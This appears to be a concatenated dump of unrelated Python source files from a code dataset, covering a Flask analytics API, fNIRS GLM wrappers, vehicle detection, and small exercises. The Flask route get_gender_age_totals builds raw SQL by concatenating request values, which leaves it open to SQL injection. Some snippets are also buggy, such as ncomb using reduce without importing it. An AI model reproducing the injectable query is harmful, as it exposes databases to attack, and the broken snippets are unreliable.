results.append(({ 'site_id' : row['__site_id'], 'date_month' : row['__date_month'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'perc_visits' : row['__perc_visits'], 'scaled_visits' : row['__scaled_visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgendertotals/', methods=['POST'])
def get_gender_age_totals():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender_age_totals(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], '__visits' : row['__visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting', methods=['GET'])
def get_sightings():
results = []
for sighting in LTESighting.get_all():
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sitescomparison', methods=['POST'])
def get_sitescomparison():
sightings = LTESighting.query\
.filter(LTESighting.smallcell.has(SmallCell.site_id.in_(request.data['selectedRow'])))\
.filter(LTESighting.timestamp.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))
return make_response(jsonify({ 'list' : [sighting.serialise() for sighting in sightings] })), 200
@app.route('/api/sighting/bysite', methods=['GET'])
def get_sightings_by_site():
site_ids = (request.args.getlist('site_id'))
results = []
#should do this better with joins!
for sighting in LTESighting.query:
if (str(sighting.smallcell.site_id)) in site_ids : results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/origindestination/all', methods=['GET'])
def get_all():
journeys = Journey.query.all()
thing = {}
for journey in journeys:
if (journey.origin_id not in thing) :
thing[journey.origin_id] = {}
if (journey.destination_id not in thing[journey.origin_id] and journey.destination_id != journey.origin_id) :
thing[journey.origin_id][journey.destination_id] = journey.data['total']
return make_response(jsonify(thing)), 200
@app.route('/api/origindestination/<origin_id>', methods=['GET'])
def get_od(origin_id):
journeys = Journey.query.all()#.filter_by(origin_id=origin_id).all()
_j = []
for journey in journeys:
_j.append({'origin_id' : journey.origin_id, 'destination_id' : journey.destination_id, 'total' : journey.data['total']})
#_j.append({'origin_id' : journey.origin_id, 'data' : (journey.data)})
return make_response(jsonify({ 'list' : _j })), 200
@app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>', methods=['GET'])
def purchase(home_district_name, type_visitor):
days_sql = db.session.query(PurchDistrict.start_dow, func.count(PurchDistrict.start_dow))\
.group_by(PurchDistrict.start_dow)\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor]))\
.order_by(func.count(PurchDistrict.start_dow).desc())\
.all()
gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender)\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
days_total = sum(i[1] for i in days_sql)
gender_total = sum(i[1] for i in gender_sql)
gender_age_total = sum(i[2] for i in gender_age_sql)
days_results = []
for result in days_sql:
days_results.append({ 'start_dow' : result.start_dow, 'count' : result[1], 'percent' : float(result[1])/float(days_total), 'total' : days_total})
gender_results = []
for result in gender_sql:
gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})
gender_age_results = []
for result in gender_age_sql:
gender_age_results.append({'gender' : result.gender, 'age' : result.age, 'count' : result[2], 'percent' : float(result[2])/float(gender_age_total)})
return make_response(jsonify({'days' : days_results, 'gender' : gender_results, 'gender_age' : gender_age_results})), 200
@app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=['GET'])
def purchase_rent(type_visitor):
gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender)\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_total = sum(i[1] for i in gender_sql)
gender_results = []
for result in gender_sql:
gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})
gender_age_rent_results = []
for result in gender_age_rent_sql:
gender_age_rent_results.append({'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'count' : result[3]})
return make_response(jsonify({'gender' : gender_results, 'gender_age_rent' : gender_age_rent_results})), 200
@app.route('/api/ng_event/districts', methods=['GET'])
def districts():
home_results = []
for result in db.session.query(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name).all():
home_results.append({'district_code' : result.home_district_code, 'district_name' : result.home_district_name, 'visitors' : result[2]})
work_results = []
for result in db.session.query(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name).all():
work_results.append({'district_code' : result.work_district_code, 'district_name' : result.work_district_name, 'visitors' : result[2]})
return make_response(jsonify({'work' : { 'list' : work_results }, 'home' : { 'list' : home_results }})), 200
@app.route('/api/ng_event/attractiontotals', methods=['GET'])
def attractiontotals():
results = []
for result in db.session.query(AttractionTotal.zone_visitors, AttractionTotal.num_visitors).all():
results.append({'zone_visitors' : result.zone_visitors, 'num_visitors' : result.num_visitors})
return make_response(jsonify({'totals' : { 'list' : results }})), 200
@app.route('/api/ng_event/profiles', methods=['GET'])
def profiles():
results = []
for result in db.session.query(Profile.country, Profile.nationality, Profile.name_province, Profile.gender, Profile.age, Profile.rent, Profile.type_visitor, Profile.date, Profile.day, Profile.period, Profile.name_tur_zone).limit(10000):
district = ''
if result.name_tur_zone == 'Zone 1' : district = 'Chamartin'
if result.name_tur_zone == 'Zone 2' : district = 'Chamberi'
if result.name_tur_zone == 'Zone 3' : district = 'Salamanca'
day = ''
if result.day == 'Monday' : day = 'Mon'
if result.day == 'Tuesday' : day = 'Tue'
if result.day == 'Wednesday' : day = 'Wed'
if result.day == 'Thursday' : day = 'Thu'
if result.day == 'Friday' : day = 'Fri'
if result.day == 'Saturday' : day = 'Sat'
if result.day == 'Sunday' : day = 'Sun'
results.append({'country' : result.country, 'nationality' : result.nationality, 'name_province' : district, 'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'type_visitor' : result.type_visitor, 'date' : result.date, 'day' : day, 'period' : result.period, 'zone' : result.name_tur_zone })
return make_response(jsonify(results)), 200
@app.route('/api/ng_event/dowfreq', methods=['GET'])
def dowfreq():
results = []
for result in db.session.query(DOWFrequency.type_visitor, DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count).all():
results.append({'type_visitor' : result.type_visitor, 'start_dow' : result.start_dow, 'start_hour' : result.start_hour, 'count' : result.count })
return make_response(jsonify(results)), 200
return app
|
7,951 | 8279c6d5f33d5580bef20e497e2948461a1de62c | # Authors: Robert Luke <mail@robertluke.net>
#
# License: BSD (3-clause)
import numpy as np
from mne.io.pick import _picks_to_idx
def run_GLM(raw, design_matrix, noise_model='ar1', bins=100,
n_jobs=1, verbose=0):
"""
Run GLM on data using supplied design matrix.
This is a wrapper function for nilearn.stats.first_level_model.run_glm.
Parameters
----------
raw : instance of Raw
The haemoglobin data.
design_matrix : as specified in Nilearn
The design matrix.
noise_model : {'ar1', 'ols'}, optional
The temporal variance model. Defaults to 'ar1'.
bins : : int, optional
Maximum number of discrete bins for the AR(1) coef histogram.
n_jobs : int, optional
The number of CPUs to use to do the computation. -1 means
'all CPUs'.
verbose : int, optional
The verbosity level. Defaut is 0
Returns
-------
glm_estimates : dict
Keys correspond to the different labels values values are
RegressionResults instances corresponding to the voxels.
"""
from nilearn.glm.first_level import run_glm
picks = _picks_to_idx(raw.info, 'fnirs', exclude=[], allow_empty=True)
ch_names = raw.ch_names
results = dict()
for pick in picks:
labels, glm_estimates = run_glm(raw.get_data(pick).T,
design_matrix.values,
noise_model=noise_model, bins=bins,
n_jobs=n_jobs, verbose=verbose)
results[ch_names[pick]] = glm_estimates[labels[0]]
return results
def compute_contrast(glm_est, contrast, contrast_type=None):
"""
Compute contrasts on regression results.
This is a wrapper function for nilearn.stats.contrasts.
Parameters
----------
glm_estimates : dict
Dictionary of nilearn regression results as returned by `run_glm`.
contrast : numpy.ndarray of shape (p) or (q, p),
Where q = number of contrast vectors and p = number of regressors.
contrast_type : {None, ‘t’, ‘F’}, optional
Type of the contrast. If None, then defaults to ‘t’ for 1D con_val
and ‘F’ for 2D con_val.
Returns
-------
contrast : Contrast instance,
Yields the statistics of the contrast (effects, variance, p-values).
"""
from nilearn.glm.contrasts import compute_contrast as _cc
return _cc(np.array(list(glm_est.keys())), glm_est, contrast,
contrast_type=contrast_type)
|
7,952 | e492680efe57bd36b58c00977ecd79196501997a | threehome = 25 * 3
twotonnel = 40 * 2
alldude = threehome + twotonnel
print('%s Заварушку устроили' % alldude)
|
7,953 | 2bc0d76e17f2f52fce9cc1925a3a0e0f53f5b81d | from fractions import Fraction
import itertools
# With MOD
MOD = 10**9+7
def ncomb(n, r):
return reduce(lambda a, b: (a*b)%MOD, (Fraction(n-i, i+1) for i in range(r)), 1)
# No MOD
def ncomb(n, r):
return reduce(lambda a, b: (a*b), (Fraction(n-i, i+1) for i in range(r)), 1)
def comb(a, l):
return [subset for subset in itertools.combinations(a, l)]
def comball(a):
r = []
for l in range(0, len(a)+1):
r.extend(comb(a, l))
return r
|
7,954 | 6c91114e0c32628b64734000c82354105032b2fd | zi=["L","Ma","Mi","J","Vi","S","D"]
V=[]
for i in range(0,len(zi)):
x=input("dati salariul de: {} ".format(zi[i]))
V.append(int(x))
print("Salariul in fiecare zi: {}".format(V))
print(sum(V))
print(round(sum(V)/7,2))
print(max(V))
vMax=[]
vMin=[]
for i in range(0,len(zi)):
if V[i]==max(V):
vMax.append(zi[i])
print(vMax)
for i in range(0,len(zi)):
if V[i]==min(V):
vMin.append(zi[i])
print(vMin)
|
7,955 | 89db4431a252d024381713eb7ad86346814fcbe4 | from sklearn.svm import SVC
from helper_functions import *
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import glob
import pickle
from scipy.ndimage.measurements import label
from keras.models import load_model
svc_model = pickle.load(open("svm_model.p", "rb"))
svc_scaler = pickle.load(open("svm_scaler.p", "rb"))
cnn_model = load_model("model.h5")
# Parameters
color_space = 'RGB' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb
orient = 9 # HOG orientations
pix_per_cell = 8 # HOG pixels per cell
cell_per_block = 2 # HOG cells per block
hog_channel = "gray" # Can be 0, 1, 2, or "ALL"
spatial_size = (32, 32) # Spatial binning dimensions
hist_bins = 32 # Number of histogram bins
spatial_feat = True # Spatial features on or off
hist_feat = True # Histogram features on or off
hog_feat = True # HOG features on or off
y_start_stop_32 = [400, 450] # Min and max in y to search in slide_window()
y_start_stop_64 = [400, 600]
y_start_stop_80 = [400, None]
y_start_stop_128 = [400, None]
xy_overlap_32 = [0.75,0.75]
xy_overlap_64 = [0.75,0.75]
xy_overlap_80 = [0.5,0.5]
xy_overlap_128 = [0.5, 0.5]
# placeholder to save frames from video
heatmap_glob = None
def process_image(image):
# image copied to be drawn into
draw_image = np.copy(image)
# create the sliding windows for individual image
window_list_32 = slide_window(image, y_start_stop=y_start_stop_32, xy_window = (32,32), xy_overlap=xy_overlap_32)
window_list_64 = slide_window(image, y_start_stop=y_start_stop_64, xy_window = (64,64), xy_overlap=xy_overlap_64)
window_list_80 = slide_window(image, y_start_stop=y_start_stop_64, xy_window = (80,80), xy_overlap=xy_overlap_80)
window_list_128 = slide_window(image, y_start_stop=y_start_stop_128, xy_window = (128,128), xy_overlap=xy_overlap_128)
# placeholder for detected window
window_detected_list = []
# iterate through the windows and detect vehicle
for window in window_list_32:
window_img = cv2.resize(image[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64))
window_features = single_extract_features(window_img, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
# Reshape and apply scaling
reshaped = window_features.reshape(1, -1)
window_features_scaled = svc_scaler.transform(reshaped)
# Predict using your classifier
prediction = svc_model.predict(window_features_scaled)
if prediction == 1:
window_detected_list.append(window)
# iterate through the windows and detect vehicle
for window in window_list_64:
window_img = cv2.resize(image[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64))
window_features = single_extract_features(window_img, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
# Reshape and apply scaling
reshaped = window_features.reshape(1, -1)
window_features_scaled = svc_scaler.transform(reshaped)
# Predict using your classifier
prediction = svc_model.predict(window_features_scaled)
if prediction == 1:
window_detected_list.append(window)
# iterate through the windows and detect vehicle
for window in window_list_80:
window_img = cv2.resize(image[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64))
window_features = single_extract_features(window_img, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
# Reshape and apply scaling
reshaped = window_features.reshape(1, -1)
window_features_scaled = svc_scaler.transform(reshaped)
# Predict using your classifier
prediction = svc_model.predict(window_features_scaled)
if prediction == 1:
window_detected_list.append(window)
# iterate through the windows and detect vehicle
for window in window_list_128:
window_img = cv2.resize(image[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64))
window_features = single_extract_features(window_img, color_space=color_space,
spatial_size=spatial_size, hist_bins=hist_bins,
orient=orient, pix_per_cell=pix_per_cell,
cell_per_block=cell_per_block,
hog_channel=hog_channel, spatial_feat=spatial_feat,
hist_feat=hist_feat, hog_feat=hog_feat)
# Reshape and apply scaling
reshaped = window_features.reshape(1, -1)
window_features_scaled = svc_scaler.transform(reshaped)
# Predict using your classifier
prediction = svc_model.predict(window_features_scaled)
if prediction == 1:
window_detected_list.append(window)
# Create a copy placeholder for heatmap
heat = np.zeros_like(image[:,:,0]).astype(np.float)
# Add heat to each box in window list
heat = add_heat(heat, window_detected_list)
# Apply threshold to help remove false positives
heat = apply_threshold(heat, 4)
# Visualize the heatmap when displaying
heatmap = np.clip(heat, 0, 255)
# Check if this is first init, initialise global heatmap
global heatmap_glob
if (heatmap_glob == None):
heatmap_glob = heatmap
new_frame_factor = 0.3
heatmap = new_frame_factor * heatmap + (1 - new_frame_factor) * heatmap_glob
heatmap = apply_threshold(heatmap, 4)
#update heatmap glob
heatmap_glob = heatmap
# Find final boxes from heatmap using label function
labels = label(heatmap)
# Get bounding box of the heatmap labels to get the image to feed into our cnn
bboxes = get_bboxes_heatmap(labels)
# Placeholder for CNN classification
valid_bboxes = []
# Feed each bbox image into CNN
for bbox in bboxes:
potential_bbox = cv2.resize(image[bbox[0][1]:bbox[1][1], bbox[0][0]:bbox[1][0]], (64, 64))
prediction = cnn_model.predict(potential_bbox[None,:,:,:])
print(prediction)
if prediction > 0.5:
valid_bboxes.append(bbox)
# Draw box for validated bbox by CNN
draw_img = draw_bboxes(np.copy(image), valid_bboxes)
# draw boxes for detected window
img_drawn = draw_boxes(draw_image, window_detected_list)
draw_img = draw_labeled_bboxes(np.copy(image), labels)
return draw_img
|
7,956 | 53b6d30bf52c43daaebe8158002db1072e34f127 | from setuptools import setup, find_packages
setup(
name='spt_compute',
version='2.0.1',
description='Computational framework for the Streamflow Prediciton Tool',
long_description='Computational framework to ingest ECMWF ensemble runoff forcasts '
' or otherLand Surface Model forecasts;'
' generate input for and run the RAPID (rapid-hub.org) program'
' using HTCondor or Python\'s Multiprocessing; and upload to '
' CKAN in order to be used by the Streamflow Prediction Tool (SPT).'
' There is also an experimental option to use the AutoRoute program'
' for flood inundation mapping.',
keywords='ECMWF, WRF, RAPID, Flood Prediction, Streamflow Prediction Tool',
author='Alan Dee Snow',
author_email='alan.d.snow@usace.army.mil',
url='https://github.com/erdc/spt_compute',
license='BSD 3-Clause',
packages=find_packages(),
install_requires=[
'numpy',
'netCDF4',
'pandas',
'RAPIDpy',
'tethys_dataset_services',
'xarray',
],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
],
extras_require={
'tests': [
'coveralls',
'pytest',
'pytest-cov',
],
},
)
|
7,957 | ca75e23d91eef8a5c5b78c0ea7c903b80640af25 | def fibonacci(n):
'''returns the nth number of the Fibonacci
sequence. where the first position is indexed at 0.
n must be an iteger greater than or equal to 0'''
#these are the first two numbers in the sequence.
fib = [0,1]
#If the users enters a number less than 2 then just get that number from the list.
if n <= 1:
#return list item at n
return fib[n]
else:
#The first two position are already defined so only calculate to the sequence n-1 times to get that position.
for i in range(n-1):
#get the two list items and add them together...
nextnum = fib[0] + fib[1]
#shift all the numbers in the list one position to the left.
fib = [fib[1], nextnum]
#The last number in the list is the postion the user asked for so return it.
return fib[1]
def lucas(n):
'''returns the nth number of the Lucas
sequence. where the first position is indexed at 0
n must be an iteger greater than or equal to 0'''
#these are the first two numbers in the Lucas sequence.
luke = [2,1]
#If the users enters a number less that 2 then just get that number from the list.
if n <= 1:
#return list item at n
return luke[n]
else:
#The first two position are already defined so only calculate to the sequence n-1 times to get that position.
for i in range(n-1):
#get the two list items and add them together...
nextnum = luke[0] + luke[1]
#shift all the numbers in the list one position to the left.
luke = [luke[1], nextnum]
#The last number in the list is the postion the user asked for so return it.
return luke[1]
def sum_series(n, x = 0, y = 1):
'''sum_series returns the nth number of the Fibonacci, the Lucas sequence
or the Foo sequence where the first position is indexed at 0. Arguments x and y as integers
are optional.
Argument n as an integer is required.
(n, 0, 1) returns the Fibinacci sequence at postion n.
(n, 2, 1) returns the Lucas sequence at postion n
(n, 3, 1)returns the Foo sequence at potions n.
Any other combo (including no optional parameters) returns the Fibonacci sequence at postion n.'''
###Fibonacci sequence calculator....
#these are the first two numbers in the sequence.
fib = [0,1]
#If the users enters a number less that 2 then just get that number from the list.
if n <= 1:
#return list item at n
fibnum = fib[n]
else:
#The first two position are already defined so only calculate to the sequence n-1 times to get that position.
for i in range(n-1):
#get the two list items and add them together...
nextnum = fib[0] + fib[1]
#shift all the numbers in the list one position to the left.
fib = [fib[1], nextnum]
#The last number in the list is the postion the user asked for so return it.
fibnum = fib[1]
###Lucas sequence calculator...
#these are the first two numbers in the Lucas sequence.
luke = [2,1]
#If the users enters a number less that 2 then just get that number from the list.
if n <= 1:
#return list item at n
lukenum = luke[n]
else:
#The first two position are already defined so only calculate to the sequence n-1 times to get that position.
for i in range(n-1):
#get the two list items and add them together...
nextnum = luke[0] + luke[1]
#shift all the numbers in the list one position to the left.
luke = [luke[1], nextnum]
#The last number in the list is the postion the user asked for so return it.
lukenum = luke[1]
###Foo sequence
#these are the first two numbers in the foo sequence.
foo = [3,2]
#If the users enters a number less that 2 then just get that number from the list.
if n <= 1:
#return list item at n
foonum = foo[n]
else:
#The first two position are already defined so only calculate to the sequence n-1 times to get that position.
for i in range(n-1):
#get the two list items and add them together...
nextnum = foo[0] + foo[1]
#shift all the numbers in the list one position to the left.
foo = [foo[1], nextnum]
#The last number in the list is the postion the user asked for so return it.
foonum = foo[1]
if x == 0 and y == 1:
return fibnum
if x == 2 and y == 1:
return lukenum
if x==3 and y ==2:
return foonum
else:
return fibnum |
7,958 | c65e14de297cc785b804e68f29bd5766ca7a8cf7 | # _*_ coding:utf-8 _*_
import csv
c=open(r"e:/test.csv","r+")
#read=csv.reader(c)
#for line in read:
# print line
read=c.readlines()
print read
c.close() |
7,959 | c62647b0b226d97926d1f53975a7aac7c39949d8 | '''This class contains a custom made format for printing complex numbers'''
class ComplexCustom(complex):
'''
This class contains function for
a custom made printing format for complex numbers
'''
def __format__(self, fmt):
'''This function creates a custom made format for printing complex numbers'''
cfmt = "({:" + fmt + "}{:+" + fmt + "}j)"
return cfmt.format(self.real, self.imag)
|
7,960 | 710bb0e0efc2c4a3ba9b1ae85e1c22e81f8ca68e | from timemachines.skatertools.testing.allregressiontests import REGRESSION_TESTS
import time
import random
TIMEOUT = 60*5
# Regression tests run occasionally to check various parts of hyper-param spaces, etc.
if __name__=='__main__':
start_time = time.time()
elapsed = time.time()-start_time
while elapsed < TIMEOUT:
a_test = random.choice(REGRESSION_TESTS)
print('Running '+str(a_test.__name__))
a_test()
elapsed = time.time() - start_time
|
7,961 | d0287b057530883a50ad9c1e5e74dce10cd825b6 | """ Python Package Support """
# Not applicable
""" Django Package Support """
# Not applicable
""" Internal Package Support """
from Data_Base.models import School, Person, Child
"""
Data_Base/Data/Imports/child_import.py
Author: Matthew J Swann;
Yong Kin;
Bradon Atkins; and
Adam Carter
Version: 1.0
Last Update: 2013-04-07
Update By: Matthew J Swann
Importing data to the person table.
"""
class ChildImport(object):
def __init__(self, scriptName=None):
# 1
x = Child.objects.create(
first_name = 'Timmy',
last_name = 'Thompson',
school = School.objects.get(pk=1),
)
x.family.add(Person.objects.get(pk=1))
x.family.add(Person.objects.get(pk=2))
x.save()
# 2
x = Child.objects.create(
first_name = 'Jimmy',
last_name = 'Johnson',
school = School.objects.get(pk=2),
)
x.family.add(Person.objects.get(pk=2))
x.family.add(Person.objects.get(pk=1))
x.save()
# 3
x = Child.objects.create(
first_name = 'Bart',
last_name = 'Simpson',
school = School.objects.get(pk=3),
)
x.family.add(Person.objects.get(pk=3))
x.family.add(Person.objects.get(pk=4))
x.save()
# 4
x = Child.objects.create(
first_name = 'Lisa',
last_name = 'Simpson',
school = School.objects.get(pk=4),
)
x.family.add(Person.objects.get(pk=4))
x.family.add(Person.objects.get(pk=3))
x.save()
# 5
x = Child.objects.create(
first_name = 'Andrew',
last_name = 'Becker',
school = School.objects.get(pk=5),
)
x.family.add(Person.objects.get(pk=5))
x.family.add(Person.objects.get(pk=6))
x.save()
# 6
x = Child.objects.create(
first_name = 'Jasmine',
last_name = 'Goulette',
school = School.objects.get(pk=6),
)
x.family.add(Person.objects.get(pk=6))
x.family.add(Person.objects.get(pk=5))
x.save()
# 7
x = Child.objects.create(
first_name = 'Kristina',
last_name = 'Murry',
school = School.objects.get(pk=7),
)
x.family.add(Person.objects.get(pk=7))
x.family.add(Person.objects.get(pk=8))
x.save()
# 8
x = Child.objects.create(
first_name = 'Andrew',
last_name = 'Scheonster',
school = School.objects.get(pk=8),
)
x.family.add(Person.objects.get(pk=8))
x.family.add(Person.objects.get(pk=7))
x.save()
|
7,962 | 13a4fb5ce9ab0a3ef9ce503698615eae4157a637 | #!/usr/bin/env python
from cos_correct_v2 import *
from angle_to_position import *
import pandas as pd
import datetime as dt
def get_position_from_angle(razon, data, start, end):
# Obtain cos factors and corrected data
dni_df, altitude_angles, azimuth_angles = data
cos_correct_df = razon.get_cos_factors(altitude_angles, azimuth_angles)
dni_df = razon.cos_correct(dni_df, cos_correct_df)
# print(dni_df)
angles = pd.DataFrame()
angles['Theta'] = dni_df['Theta_']
angles['Phi'] = dni_df['Phi_']
# angles['Time'] = dni_df['Time (hh:mm:ss)']
# angles['Datetime Local'] = dni_df['Datetime Local']
# print(angles)
def match_angles_wrapper(angles):
mapping = read_and_clean_angle_position()
return match_angles(mapping, angles[0], angles[1])
positions = angles.apply(match_angles_wrapper, axis=1)
# print(positions)
positions = [(x[0], x[1]) for x in positions]
positions = zip(*positions)
# print(positions)
positions = pd.DataFrame(positions).transpose()
positions['Datetime Local'] = dni_df['Datetime Local']
# print(positions)
return positions
def main():
# Communicate to RaZON through local webpage
razon = RaZON(lat=37.595932, lon=-122.368848, panel_tilt=20, razonIP="192.168.15.150")
# Use RaZON.get_local_datetime
# now = razon.get_local_datetime() - dt.timedelta(days=1)
now = dt.datetime(2018, 4, 9)
# Samples data between two datetime objects (date is supplied by )
start = dt.datetime(year=now.year,
month=now.month,
day=now.day,
hour=13,
minute=45,
second=0)
end = dt.datetime(year=now.year,
month=now.month,
day=now.day,
hour=16,
minute=0,
second=0)
data = razon.request_interval(now, start, end)
positions = get_position_from_angle(razon, data, start, end)
print(positions)
# # Loop through appropriate angles:
# for angle in angles:
# mapping = read_and_clean_angle_position()
# x, y = match_angles(mapping, theta, phi)
if __name__ == '__main__':
main()
|
7,963 | 4453b8176cda60a3a8f4800860b87bddfdb6cafa |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: from __future__ import division, print_function, absolute_import
2:
3: import os
4: from os.path import join
5:
6: from scipy._build_utils import numpy_nodepr_api
7:
8:
9: def configuration(parent_package='',top_path=None):
10: from numpy.distutils.misc_util import Configuration
11: from numpy.distutils.system_info import get_info
12: config = Configuration('integrate', parent_package, top_path)
13:
14: # Get a local copy of lapack_opt_info
15: lapack_opt = dict(get_info('lapack_opt',notfound_action=2))
16: # Pop off the libraries list so it can be combined with
17: # additional required libraries
18: lapack_libs = lapack_opt.pop('libraries', [])
19:
20: mach_src = [join('mach','*.f')]
21: quadpack_src = [join('quadpack', '*.f')]
22: lsoda_src = [join('odepack', fn) for fn in [
23: 'blkdta000.f', 'bnorm.f', 'cfode.f',
24: 'ewset.f', 'fnorm.f', 'intdy.f',
25: 'lsoda.f', 'prja.f', 'solsy.f', 'srcma.f',
26: 'stoda.f', 'vmnorm.f', 'xerrwv.f', 'xsetf.f',
27: 'xsetun.f']]
28: vode_src = [join('odepack', 'vode.f'), join('odepack', 'zvode.f')]
29: dop_src = [join('dop','*.f')]
30: quadpack_test_src = [join('tests','_test_multivariate.c')]
31: odeint_banded_test_src = [join('tests', 'banded5x5.f')]
32:
33: config.add_library('mach', sources=mach_src,
34: config_fc={'noopt':(__file__,1)})
35: config.add_library('quadpack', sources=quadpack_src)
36: config.add_library('lsoda', sources=lsoda_src)
37: config.add_library('vode', sources=vode_src)
38: config.add_library('dop', sources=dop_src)
39:
40: # Extensions
41: # quadpack:
42: include_dirs = [join(os.path.dirname(__file__), '..', '_lib', 'src')]
43: if 'include_dirs' in lapack_opt:
44: lapack_opt = dict(lapack_opt)
45: include_dirs.extend(lapack_opt.pop('include_dirs'))
46:
47: config.add_extension('_quadpack',
48: sources=['_quadpackmodule.c'],
49: libraries=['quadpack', 'mach'] + lapack_libs,
50: depends=(['__quadpack.h']
51: + quadpack_src + mach_src),
52: include_dirs=include_dirs,
53: **lapack_opt)
54:
55: # odepack/lsoda-odeint
56: odepack_opts = lapack_opt.copy()
57: odepack_opts.update(numpy_nodepr_api)
58: config.add_extension('_odepack',
59: sources=['_odepackmodule.c'],
60: libraries=['lsoda', 'mach'] + lapack_libs,
61: depends=(lsoda_src + mach_src),
62: **odepack_opts)
63:
64: # vode
65: config.add_extension('vode',
66: sources=['vode.pyf'],
67: libraries=['vode'] + lapack_libs,
68: depends=vode_src,
69: **lapack_opt)
70:
71: # lsoda
72: config.add_extension('lsoda',
73: sources=['lsoda.pyf'],
74: libraries=['lsoda', 'mach'] + lapack_libs,
75: depends=(lsoda_src + mach_src),
76: **lapack_opt)
77:
78: # dop
79: config.add_extension('_dop',
80: sources=['dop.pyf'],
81: libraries=['dop'],
82: depends=dop_src)
83:
84: config.add_extension('_test_multivariate',
85: sources=quadpack_test_src)
86:
87: # Fortran+f2py extension module for testing odeint.
88: config.add_extension('_test_odeint_banded',
89: sources=odeint_banded_test_src,
90: libraries=['lsoda', 'mach'] + lapack_libs,
91: depends=(lsoda_src + mach_src),
92: **lapack_opt)
93:
94: config.add_subpackage('_ivp')
95:
96: config.add_data_dir('tests')
97: return config
98:
99:
100: if __name__ == '__main__':
101: from numpy.distutils.core import setup
102: setup(**configuration(top_path='').todict())
103:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
module_type_store = Context(None, __file__)
# ################# Begin of the type inference program ##################
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 3, 0))
# 'import os' statement (line 3)
import os
import_module(stypy.reporting.localization.Localization(__file__, 3, 0), 'os', os, module_type_store)
stypy.reporting.localization.Localization.set_current(stypy.reporting.localization.Localization(__file__, 4, 0))
# 'from os.path import join' statement (line 4)
update_path_to_current_file_folder('C:/Python27/lib/site-packages/scipy/integrate/')
